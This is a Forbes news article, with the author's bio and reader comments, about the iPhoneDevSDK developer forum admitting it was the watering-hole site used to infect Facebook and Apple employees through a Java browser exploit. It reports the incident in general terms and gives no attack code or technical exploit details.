I'm a technology, privacy, and information security reporter and most recently the author of the book This Machine Kills Secrets, a chronicle of the history and future of information leaks, from the Pentagon Papers to WikiLeaks and beyond.
I've covered the hacker beat for Forbes since 2007, with frequent detours into digital miscellania like switches, servers, supercomputers, search, e-books, online censorship, robots, and China. My favorite stories are the ones where non-fiction resembles science fiction. My favorite sources usually have the word "research" in their titles.
Since I joined Forbes, this job has taken me from an autonomous car race in the California desert all the way to Beijing, where I wrote the first English-language cover story on the Chinese search billionaire Robin Li for Forbes Asia. Black hats, white hats, cyborgs, cyberspies, idiot savants and even CEOs are welcome to email me at agreenberg (at) forbes.com. My PGP public key can be found here.

Developer Site That Was Used To Hack Facebook And Apple Issues Mea Culpa

The recent hacker breaches of high-profile tech firms including Facebook and Apple began with the compromise of another site you’ve likely never heard of: iPhoneDevSDK.com. And now that initial victim in the hacking spree is coming clean.

“Today, we were alerted that our site was part of an elaborate and sophisticated attack whose victims included large internet companies,” wrote iPhoneDevSDK co-founder Ian Sefferman in a blog post on his popular mobile developer forum site Tuesday. Sefferman said that he only learned of the attack from a post on AllThingsD, which first reported the site’s involvement. “Prior to this article, we had no knowledge of this breach and hadn’t been contacted by Facebook, any other company, or any law enforcement about the potential breach.”

Sefferman confirms that his site was used in a so-called “watering hole” attack that infected several of Facebook’s computers and possibly those of other companies’ with malicious software when they visited. Sefferman writes that an administrator account for the site was hijacked to add javascript code that ”appears to have used a sophisticated, previously unknown exploit to hack into certain user’s computers.”

According to Facebook and Apple, which was reported Tuesday to have been targeted in the same attack, that “previously unknown exploit” took advantage of a bug in Oracle’s Java plug-in in victims’ browsers. Twitter, which revealed earlier that it was the victim of a similar breach, also hinted at the time that Java was involved in its compromise. A report Tuesday from Bloomberg newswires said that as many as 40 companies may have been targeted, and that the hackers seem to be based in Eastern Europe, citing unnamed sources close to a law enforcement investigation of the breaches.

Sefferman says that iPhoneDevSDK has determined that the exploit was removed by the hacker on January 30th. And the site has reset all users’ passwords to prevent the hijacked administrator’s account from changing its code again. Nonetheless, users should exercise caution visiting iPhoneDevSDK.com, and be sure to disable the Java plug-in in their browser if they do. (In fact, you should probably disable Java in your browser regardless.)

Like Facebook and Apple, iPhoneDevSDK says it believes that none of its own user data was compromised–cold comfort to the tech firms whose employees’ computers were hacked via the site.

“We’re very sorry for the inconvenience,” Sefferman writes. “We’ll work tirelessly to ensure your data’s security now and in the future.”

Post Your Comment

Post Your Reply

Forbes writers have the ability to call out member comments they find particularly interesting. Called-out comments are highlighted across the Forbes network. You'll be notified if your comment is called out.

This article is a little confusing. First is says there was a little-known JavaScript exploit and then it goes on to talk about a vulnerability with Oracle’s Java plugin and that we should just turn off the Java plugin in the browser.

Here is how I am reading the tech in this article: the Oracle Java plugin ( the object-oriented byte-code compiled applet-running VM) is injecting JavaScript (a client-side uncompilable interpreted script of a similar name but not really related to Oracle Java) that has an exploit that can get past the security of the local computer.

I think it is more likely that the Oracle Java plugin is downloading a bytecode Java applet that is exploiting the system, and JavaScript has nothing to do with this right?

Thoughts? Corrections? Are we still confused about what Java versus JavaScript is? or am I making wrong assumptions about what has been written here?

Hey Steve, I can see the confusion due to the fact that both Java and javascript (very different things, I know!) seem to be involved here.

I can only go on what Sefferman and Facebook have said. Sefferman writes that javascript was injected into iPhonedevSDK. Facebook has said that it was compromised using an exploit that took advantage of a previously unknown vulnerability in Java. So it seems that the javascript on iPhonedevSDK launched a Java applet, which is what compromised the victims’ machines.

I was also suspicious that Sefferman might have confused Java and javascript, and wrote to him to ask for a clarification and confirmation of the use of a Java vulnerability. But I haven’t heard back from him yet. I’ll update this post if he tells me something different from what I’ve written.

If you are correct it makes Apple look even more complacent. I appreciate that some business applications are java based and thus as such some employees need to enable/disable Java for legitimate work purposes.

It looks as though the infected site did not require Java to be enabled in order to use it. Yet again it begs the question “why were (some) apple employees so blase about security?”.

One also wonders if Facebook told Apple (and Oracle) about the exploit. If they had kept the discovery of the Java MacAttack to themselves then shame on them. If they did tell Apple, then it suggests that apple has some pretty serious internal communication issues.